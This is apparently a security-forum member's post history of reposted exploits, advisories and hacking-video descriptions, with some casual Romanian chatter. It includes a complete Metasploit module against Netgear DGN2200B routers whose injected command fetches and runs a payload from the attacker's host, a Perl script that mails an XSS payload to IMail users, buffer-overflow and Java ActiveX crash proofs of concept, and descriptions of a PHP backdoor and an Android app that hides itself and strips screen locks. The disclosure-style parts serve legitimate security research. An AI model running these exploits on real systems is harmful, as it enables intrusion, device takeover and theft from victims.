-
Posts
638 -
Joined
-
Last visited
-
Days Won
1
Everything posted by Kwelwild
-
La multi b/ani!
-
Lan Messenger sending PM Buffer Overflow(UNICODE) - Overwrite SEH # Exploit Title: Lan Messenger Version 1.2 Buffer Overflow vulnerability - UNICODE(POC) # Date: 09-05-2013 # Exploit Author: ariarat # Vendor Homepage: http://lmadhavan.com # Software Link: http://lmadhavan.com/software/archive/lanmsg12.zip # Version: 1.2 & may be old versions! # Tested on: [ Windows 7 & windows XP sp2,sp3] #============================================================================================ # After creating txt file,open created file and copy the AAA... string to clipboard and # then paste in Public Chat's send PM section or in any window for sending PM to others. # #============================================================================================ # Contact : #------------------ # Web Page : http://ariarat.blogspot.com # Email : mehdi.esmaeelpour@gmail.com #============================================================================================ #!/usr/bin/python filename="string.txt" buffer = "\x41" * 2000 textfile = open(filename , 'w') textfile.write(buffer) textfile.close() Sursa: Lan Messenger sending PM Buffer Overflow(UNICODE) - Overwrite SEH
-
uniune tot select ))))))))))
-
Am gasit si eu unul, l-am raportat si astept de o gramada de timp sa ma adauge in HoF, imi tot trimit email-uri ca il vor repara, ca sunt multumiti de modul de cooperare (mi-au cerut cateva detalii) si etc. ON: Felicitari, poate ne vedem pe hall of fame
-
Ce sa faca ma? Sa dea RST down? Daca ma pun cu lozls nu au ei zile bune.
-
http://www.youtube.com/watch?v=0q5MLRt3lHs
-
Description: Create, load, and manage a PHP backdoor. Follow DarkSoloNetwork on Facebook: https://www.facebook.com/pages/Darkso... and Twitter: https://twitter.com/DarkSoloNetwork IMPORTANT : DarkSoloNetwork assumes no responsibility for misuse of the information contained in the video. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: [Tutorial] Weevely Php Backdoor
-
Facebook Trusted Contacts apeleaza la prieteni sa-ti salveze contul
Kwelwild replied to Syckchet's topic in Stiri securitate
De ce sange faci reclama la site-ul ala prin toate posturile?! -
http://www.youtube.com/watch?feature=player_embedded&v=h2snSAWTPiQ Description: Null Security Team writing a python script for Automated HTTP Enumeration. currently only in the initial beta stage, but includes basic checking of files including the Apache server-status as well as well IIS WebDAV and Microsoft FrontPage Extensions, many more features will be added to this tool which will make lot of the enumeration process quick and simple. Download link - https://www.thexero.co.uk/tools/ Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Automated HTTP Enumeration Tool in Backtrack 5 R3 - YouTube Sursa: Automated Http Enumeration Tool
-
Description: WPauditor is a wordpress scanner, works with the core Shurik3n. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Wpauditor (Shurik3n Module)
-
Description: Shuriken module to query with search engine SHODAN by: Dshellnoi_Unix Some beta tester? or someone wants to join the project? Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Aux::Util::Shodan
-
Description: In this episode of SecuraTip, we demo the use of tekCollect. tekCollect is a python tool written by @TekDefense, which is useful for scraping data (IP addresses, MD5 hashes, SSNs, Emails, etc) from URLs and files. This episode highlights several use cases for the tool, while also exploring advanced features such as custom regex scrapes. To download tekCollect goto: TekDefense - tekCollect Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Securatip Episode 4: Pull Usefull Data From Files And Urls With Tekcollect
-
Description: In this video we will see how we can attack a MySQL database with the help of Metasploit framework. I used some auxiliary tools to analyse and login mysql server. The target machine is metasploitable. So if you want to setup your own vulnerable lab you can use it.. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Mysql Server Vs Msf-Machine Hack
-
Ipswitch IMail 11.01 - XSS Vulnerability #!/usr/bin/perl # Exploit Title: Ipswitch IMail 11.01 XSS Vulnerability # Date: 26-04-2013 # Author: DaOne aka Mocking Bird # Vendor Homepage: http://www.ipswitch.com/ # Platform: windows use Net::SMTP; # ARGV Check if ($#ARGV != 2) { print "\nUSAGE: IMail.pl <Mail Server> <Attacker Email> <VicTim Email>\n"; exit; } $host = $ARGV[0]; $attacker = $ARGV[1]; $victim = $ARGV[2]; # Config SMTP $smtp = Net::SMTP->new( Host => $host, Hello => 'Hello world', Timeout => 30) or die "Couldn't connect to Mail Server\n"; # Attacker and Victim email $smtp->mail($attacker); $smtp->to($victim); # Send email $buffer = "From: XSS\n". "To: testing\n". "Subject: testing\n". "MIME-Version: 1.0\n". "Content-Type: multipart/mixed;\n". " boundary=\"--=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019\"\n\n". "----=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019\n". "Content-Type: text/html;\n". "charset=\"utf-8\"\n". "Content-Transfer-Encoding: quoted-printable\n\n". "XSS\n". "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n". "<HTML><BODY>\n". "<script >alert(document.cookie)</script >\n". "</BODY></HTML>\n\n". "----=45145578442838848853975045745715171602582966277178406402638054315034128543847104614337851625097187549984363453814450535441019--"; $smtp->data(); $smtp->datasend($buffer); $smtp->quit(); print "Send.\n"; # Proof http://oi40.tinypic.com/34yw8hz.jpg Sursa: Ipswitch IMail 11.01 - XSS Vulnerability
-
De unde sange veniti cu prezentarile astea? Citeste asta: https://rstforums.com/forum/28420-interviu-bine-ati-venit.rst
-
Bine ai venit din trecut.
-
Some Netgear Routers are vulnerable to an authenticated OS command injection on their web interface. Default credentials for the web interface are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. This Metasploit module overwrites parts of the PPOE configuration, while the module tries to restore it after exploitation configuration backup is recommended. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::HttpServer include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Netgear DGN2200B pppoe.cgi Remote Command Execution', 'Description' => %q{ Some Netgear Routers are vulnerable to an authenticated OS command injection on their web interface. Default credentials for the web interface are admin/admin or admin/password. Since it is a blind os command injection vulnerability, there is no output for the executed command when using the cmd generic payload. A ping command against a controlled system could be used for testing purposes. This module overwrites parts of the PPOE configuration, while the module tries to restore it after exploitation configuration backup is recommended. }, 'Author' => [ 'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module 'juan vazquez' # minor help with msf module ], 'License' => MSF_LICENSE, 'References' => [ [ 'BID', '57998' ], [ 'EDB', '24513' ], [ 'OSVDB', '90320' ], [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-015' ] ], 'DisclosureDate' => 'Feb 15 2013', 'Privileged' => true, 'Platform' => ['linux','unix'], 'Payload' => { 'DisableNops' => true }, 'Targets' => [ [ 'CMD', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ], [ 'Linux mipsbe Payload', { 'Arch' => ARCH_MIPSBE, 'Platform' => 'linux' } ], ], 'DefaultTarget' => 1, )) register_options( [ OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]), OptString.new('PASSWORD', [ true, 'The password for the specified username', 'password' ]), OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]), OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]), OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]), OptInt.new('RELOAD_CONF_DELAY', [true, 'Time to wait to allow the remote device to load configuration', 45]) ], self.class) end def get_config(config, pattern) if config =~ /#{pattern}/ #puts "[*] #{$1}" #debugging return $1 end return "" end def grab_config(user,pass) print_status("#{rhost}:#{rport} - Trying to download the original configuration") begin res = send_request_cgi({ 'uri' => '/BAS_pppoe.htm', 'method' => 'GET', 'authorization' => basic_auth(user,pass) }) if res.nil? or res.code == 404 fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end if [200, 301, 302].include?(res.code) if res.body =~ /pppoe_username/ print_good("#{rhost}:#{rport} - Successfully downloaded the configuration") else fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - Download of the original configuration not possible or the device uses a configuration which is not supported") end else fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server") end @pppoe_username_orig = get_config(res.body, "<td\ align=\"right\"><input\ type=\"text\"\ name=\"pppoe_username\"\ size=\"15\"\ maxlength=\"63\"\ value=\"(.*)\"><\/td") @pppoe_passwd_orig = get_config(res.body, "<td\ align=\"right\"><input\ type=\"password\"\ name=\"pppoe_passwd\"\ size=\"15\"\ maxlength=\"63\"\ value=\"(.*)\"><\/td") @pppoe_servicename_orig = get_config(res.body, "<td\ align=\"right\"><input\ type=\"text\"\ name=\"pppoe_servicename\"\ maxlength=\"63\"\ size=\"15\"\ value=\"(.*)\"><\/td") @runtest_orig = get_config(res.body, "<input\ type=\"hidden\"\ name=\"runtest\"\ value=\"(.*)\">") @wan_ipaddr_orig = get_config(res.body, "<INPUT\ name=wan_ipaddr\ type=hidden\ value=\ \"(.*)\">") @pppoe_localip_orig = get_config(res.body, "<INPUT\ name=pppoe_localip\ type=hidden\ value=\ \"(.*)\">") @wan_dns_sel_orig = get_config(res.body, "<INPUT\ name=wan_dns_sel\ type=hidden\ value=\ \"(.*)\">") @wan_dns1_pri_orig = get_config(res.body, "<INPUT\ name=wan_dns1_pri\ type=hidden\ value=\ \"(.*)\">") @wan_dns1_sec_orig = get_config(res.body, "<INPUT\ name=wan_dns1_sec\ type=hidden\ value=\ \"(.*)\">") @wan_hwaddr_sel_orig = get_config(res.body, "<INPUT\ name=wan_hwaddr_sel\ type=hidden\ value=\ \"(.*)\">") @wan_hwaddr_def_orig = get_config(res.body, "<INPUT\ name=wan_hwaddr_def\ type=hidden\ value=\ \"(.*)\">") @wan_hwaddr2_orig = get_config(res.body, "<INPUT\ name=wan_hwaddr2\ type=hidden\ value=\ \"(.*)\">") @wan_hwaddr_pc_orig = get_config(res.body, "<INPUT\ name=wan_hwaddr_pc\ type=hidden\ value=\ \"(.*)\">") @wan_nat_orig = get_config(res.body, "<INPUT\ name=wan_nat\ type=hidden\ value=\ \"(.*)\">") @opendns_parental_ctrl_orig = get_config(res.body, "<INPUT\ name=opendns_parental_ctrl\ type=hidden\ value=\ \"(.*)\">") @pppoe_flet_sel_orig = get_config(res.body, "<INPUT\ name=pppoe_flet_sel\ type=hidden\ value=\ \"(.*)\">") @pppoe_flet_type_orig = get_config(res.body, "<INPUT\ name=pppoe_flet_type\ type=hidden\ value=\ \"(.*)\">") @pppoe_temp_orig = get_config(res.body, "<INPUT\ name=pppoe_temp\ type=hidden\ value=\ \"(.*)\">") @apply_orig = get_config(res.body, "<input\ type=\"SUBMIT\"\ name=\"apply\"\ value=(.*)\ onClick=\"return\ checkData\(\)\">") end def restore_conf(user,pass,uri) # we have used most parts of the original configuration # just need to restore pppoe_username cmd = @pppoe_username_orig print_status("#{rhost}:#{rport} - Asking the Netgear device to reload original configuration") res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to reload original configuration") end print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration") select(nil, nil, nil, @timeout) end def request(cmd,user,pass,uri) begin #original post request #login_type=PPPoE%28PPP+over+Ethernet%29&pppoe_username=%26%20COMMAND%20%26 #&pppoe_passwd=69cw20hb&pppoe_servicename=&pppoe_dod=1&pppoe_idletime=5 #&WANAssign=Dynamic&DNSAssign=0&en_nat=1&MACAssign=0&apply=%C3%9Cbernehmen #&runtest=yes&wan_ipaddr=0.0.0.0&pppoe_localip=0.0.0.0&wan_dns_sel=0 #&wan_dns1_pri=0.0.0.0&wan_dns1_sec=...&wan_hwaddr_sel=0 #&wan_hwaddr_def=84%3A1B%3A5E%3A01%3AE7%3A05&wan_hwaddr2=84%3A1B%3A5E%3A01%3AE7%3A05 #&wan_hwaddr_pc=5C%3A26%3A0A%3A2B%3AF0%3A3F&wan_nat=1&opendns_parental_ctrl=0 #&pppoe_flet_sel=&pppoe_flet_type=&pppoe_temp=&opendns_parental_ctrl=0 res = send_request_cgi( { 'uri' => uri, 'method' => 'POST', 'authorization' => basic_auth(user,pass), 'encode_params' => false, 'vars_post' => { "login_type" => "PPPoE%28PPP+over+Ethernet%29",#default must be ok "pppoe_username" => cmd, "pppoe_passwd" => @pppoe_passwd_orig, "pppoe_servicename" => @pppoe_servicename_orig, "pppoe_dod" => "1", #default must be ok "pppoe_idletime" => "5", #default must be ok "WANAssign" => "Dynamic", #default must be ok "DNSAssign" => "0", #default must be ok "en_nat" => "1", #default must be ok "MACAssign" => "0", #default must be ok "apply" => @apply_orig, "runtest" => @runtest_orig, "wan_ipaddr" => @wan_ipaddr_orig, "pppoe_localip" => @pppoe_localip_orig, "wan_dns_sel" => @wan_dns_sel_orig, "wan_dns1_pri" => @wan_dns1_pri_orig, "wan_dns1_sec" => @wan_dns1_sec_orig, "wan_hwaddr_sel" => @wan_hwaddr_sel_orig, "wan_hwaddr_def" => @wan_hwaddr_def_orig, "wan_hwaddr2" => @wan_hwaddr2_orig, "wan_hwaddr_pc" => @wan_hwaddr_pc_orig, "wan_nat" => @wan_nat_orig, "opendns_parental_ctrl" => @opendns_parental_ctrl_orig, "pppoe_flet_sel" => @pppoe_flet_sel_orig, "pppoe_flet_type" => @pppoe_flet_type_orig, "pppoe_temp" => @pppoe_temp_orig, "opendns_parental_ctrl" => @opendns_parental_ctrl_orig } }) return res rescue ::Rex::ConnectionError vprint_error("#{rhost}:#{rport} - Failed to connect to the web server") return nil end end def logout(user,pass) begin res = send_request_cgi({ 'uri' => '/LGO_logout.htm', 'method' => 'GET', 'authorization' => basic_auth(user,pass) }) if res.nil? or res.code == 404 fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful logout possible") end rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server") end end def exploit downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) uri = '/pppoe.cgi' user = datastore['USERNAME'] pass = datastore['PASSWORD'] @timeout = datastore['RELOAD_CONF_DELAY'] # # testing Login # print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}") begin res = send_request_cgi({ 'uri' => '/', 'method' => 'GET', 'authorization' => basic_auth(user,pass) }) if res.nil? or res.code == 404 fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end if [200, 301, 302].include?(res.code) print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}") else fail_with(Exploit::Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}") end rescue ::Rex::ConnectionError fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server") end grab_config(user,pass) if target.name =~ /CMD/ if not (datastore['CMD']) fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") end cmd = payload.encoded cmd = "%26%20#{cmd}%20%26" res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") else print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") end return end #thx to Juan for his awesome work on the mipsel elf support @pl = generate_payload_exe @elf_sent = false # # start our server # resource_uri = '/' + downfile if (datastore['DOWNHOST']) service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri else #do not use SSL if datastore['SSL'] ssl_restore = true datastore['SSL'] = false end #we use SRVHOST as download IP for the coming wget command. #SRVHOST needs a real IP address of our download host if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = Rex::Socket.source_address(rhost) else srv_host = datastore['SRVHOST'] end service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...") start_service({'Uri' => { 'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => resource_uri }}) datastore['SSL'] = true if ssl_restore end # # download payload # print_status("#{rhost}:#{rport} - Asking the Netgear device to download and execute #{service_url}") #this filename is used to store the payload on the device filename = rand_text_alpha_lower(8) cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename};chmod 777 /tmp/#{filename};/tmp/#{filename}" cmd = Rex::Text.uri_encode(cmd) cmd = "%26%20#{cmd}%20%26" res = request(cmd,user,pass,uri) if (!res) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end # wait for payload download if (datastore['DOWNHOST']) print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Netgear device to download the payload") select(nil, nil, nil, datastore['HTTP_DELAY']) else wait_linux_payload end register_file_for_cleanup("/tmp/#{filename}") # #reload original configuration # restore_conf(user,pass,uri) # #lockout of the device and free the management sessions # logout(user,pass) end # Handle incoming requests from the server def on_request_uri(cli, request) #print_status("on_request_uri called: #{request.inspect}") if (not @pl) print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!") return end print_status("#{rhost}:#{rport} - Sending the payload to the server...") @elf_sent = true send_response(cli, @pl) end # wait for the data to be sent def wait_linux_payload print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...") waited = 0 while (not @elf_sent) select(nil, nil, nil, 1) waited += 1 if (waited > datastore['HTTP_DELAY']) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?") end end end end Sursa: Netgear DGN2200B pppoe.cgi Remote Command Execution ? Packet Storm
-
Ce se intampla intr-o ora petrecuta pe net Cercetari realizate pe obiceiurile de consul a 25 de milioane de utilizatori ai internetului din intreaga lume scot la iveala faptul ca un sfert dintr-o ora petrecuta pe net este dedicata retelelor de socializare. Shoppingul online, divertismentul si retelele de socializare se afla pritre cele mai cautate pe internet de utilizatorii din intreaga lume. Studii realizate pe 25 de milioane de "navigatori" din intreaga lume arata ca americanii sunt cei mai dedicati socializarii, in timp ce britanicii sunt campioni la cumparaturile online. 10% dintre internautii din Regatul Unit isi dedica cea mai mare parte a timpului shoppingului, comparativ cu 9% dintre americani si 6% dintre australieni. Numai anul trecut de Craciun s-au "consumat" 370 de milioane de ore in cautarea cadourilor in Marea Britanie, cu 24% mai mult timp decat intr-o luna obisnuita. Retelele de socializare sunt cele mai populare in Statele Unite, 15 minute dintr-o ora dedicand americanii acestei forme de petrecere a timpului liber pe internet. Australienii petrec 14 minute pe Facebook sau Twitter, in timp ce britanicii doar 13 minute dintr-o ora. Australienii sunt cei mai mari consumatori de stiri, 6% din totalul timpului petrecut pe internet fiind dedicat site-urilor de stiri, britanicii dedicand doar 5% din timp, iar americanii doar 4%. Sursa: Ce se intampla intr-o ora petrecuta pe net - www.yoda.ro
-
Description: Attack against a Wep 64 bits + Essid Hidden + Mac filtering [spanish] wireless network. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Wep 64 Bits + Essid Hidden + Mac Filtering [spanish]
-
Imi place, mi-am facut si eu un cont pentru timpul liber.
-
Java Web Start Launcher ActiveX Control - Memory Corruption SEC Consult Vulnerability Lab Security Advisory < 20130417-1 > ======================================================================= title: Java ActiveX Control Memory Corruption product: Java(TM) Web Start Launcher vulnerable version: Sun Java Version 7 Update 17 and before Sun Java Version 6 Update 43 and before Sun Java Version 5.0 Update 41 and before fixed version: Patch information see sections below CVE: CVE-2013-2419 impact: medium homepage: http://www.java.com/ found: 2012-11-13 by: A. Antukh SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "To date, the Java platform has attracted more than 9 million software developers. It's used in every major industry segment and has a presence in a wide range of devices, computers, and networks. Java technology's versatility, efficiency, platform portability, and security make it the ideal technology for network computing. From laptops to datacenters, game consoles to scientific supercomputers, cell phones to the Internet, Java is everywhere!" Source: http://www.java.com/en/about/ Vulnerability overview/description: ----------------------------------- Memory corruption vulnerability exists in the launchApp() method of the deployJava1.dll which is loaded by Internet Explorer and used to launch javaws.exe with provided arguments. The second (optional) parameter that is responsible for embedded data is checked improperly, which causes memory corruption and reading from arbitrary address if specific conditions are met. Successful exploitation of this vulnerability could potentially result in an arbitrary code execution within the Java(TM) Web Start Launcher or cause the application to crash. Vulnerability details: ----------------- The launchApp() method expects the following arguments: *pJNLP, *pEmbedded (optional) and *pVmArgs (optional). Providing a single wrong *pJNLP argument causes an application to prompt an error message and exit. However, if an attacker provides the second argument, it will be checked before quitting. The function responsible for processing an auto-generated temp file containing input args is the following: .text:0040560F push eax ; size of input data .text:00405610 push esi ; malcrafted string .text:00405611 call tmp_processing If the input length doesn't satisfy condition of bitwise AND, the function returns zero and exits: .text:0040950B mov edx, [ebp+arg_4] .text:0040950E test dl, 3 ; if size satisfies condition .text:00409511 jz short loc_409517 ; jump to processing .text:00409513 xor eax, eax ; otherwise return 0 and exit .text:00409515 leave .text:00409516 retn The returned data is used later to write from, causing an access violation: .text:00405611 call tmp_processing .text:00405616 mov esi, eax ... (cc0.9fc): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00155a10 ebx=00000000 ecx=00000008 edx=ffd21610 esi=00000000 edi=00000001 eip=00402a0d esp=0012e6a8 ebp=0012e734 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 javaws+0x2a0d: 00402a0d 8b86cc000000 mov eax,dword ptr [esi+0CCh] ds:0023:000000cc=???????? However, if the size fits the condition of bitwise AND, the program flow continues. The memory of input string length size is allocated: .text:00409547 push eax ; size_t .text:00409548 mov [ebp+var_4], ecx .text:0040954B call _malloc First WORD of the malformed string is taken and compared to 3Dh (equal sign '=') to ignore it. If the WORD is not equal to 3Dh, data from the calculated offset from input string is read. .text:00409571 cmp ecx, 3Dh .text:00409574 jnz short crash_place .text:00409576 xor ecx, ecx .text:00409578 jmp short loc_409582 .text:0040957A ; --------------------------------------------------------------------------- .text:0040957A .text:0040957A crash_place: ; CODE XREF: tmp_processing+97j .text:0040957A movzx ecx, word_445670[ecx*2] If the resulting offset points to unallocated memory, an access violation exception is thrown: eax=001542a0 ebx=001559f8 ecx=0000aaee edx=00000000 esi=00000000 edi=001558c8 eip=0040957a esp=0012e650 ebp=0012e668 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 javaws+0x957a: 0040957a 0fb70c4d70564400 movzx ecx,word ptr javaws+0x45670 (00445670)[ecx*2] ds:0023:0045ac4c=???? When carefully calculated, this could potentially lead to arbitrary code execution. The following PoC code can be used to test this vulnerability. It will crash the javaws.exe process when opened in Internet Explorer. <HTML> <HEAD> <TITLE>Java ActiveX component memory corruption</TITLE> </HEAD> <BODY> <OBJECT id='javaws' classid='clsid:CAFEEFAC-DEC7-0000-0001-ABCDEFFEDCBA'></object> <SCRIPT> function Exploit(){ var dword=unescape("%uAAAA%uBBBB"); for( mem = ""; mem.length<0x2F; mem +=dword ); javaws.launchApp(mem,mem,mem); } Exploit(); </SCRIPT> </BODY> </HTML> Vulnerable / tested versions: ----------------------------- The vulnerability has been verified to exist in Java(TM) Platform SE 7 U9, which was the most recent version at the time of discovery. Vendor contact timeline: ------------------------ 2012-11-16: Contacted vendor through secalert_us@oracle.com 2012-11-17: Initial vendor response - issues will be verified 2012-11-30: Vulnerability is confirmed and reproduced by the vendor 2013-02-25: Under investigation / Being fixed in main codeline 2013-03-26: Issue fixed in main codeline, scheduled for a future CPU 2013-04-13: Oracle: Advisory and patches will be released on 2013-04-16 2013-04-16: Oracle releases April 2013 CPU 2013-04-17: Public release of SEC Consult advisory Solution: --------- Apply latest patches, see: http://www.oracle.com/technetwork/topics/security/javacpuapr2013-1928497.html Workaround: ----------- No workaround is available. Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com https://www.sec-consult.com EOF A. Antukh / @2013 Sursa: Java Web Start Launcher ActiveX Control - Memory Corruption
-
Description: This Series show, how to create an Android Application, which easily bypasses the Phone Users privacy and allows us to do Remote Code Execution on the Phone. If the phone is rooted, we can then Remove Screen Protections like Patterns, PIN and Passwords as well as installing the App as System App, without letting the User know what happens. Also it can remove the App Icon from the launcher, so the user may not even know, that the App is even installed. GitHub : https://github.com/Evisceration/RemoteCodeExecution Whole Series Created By : Alexander Martinz Visit us @ http://www.openfire-security.net/ Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Android Development - Remote Code Execution Video Series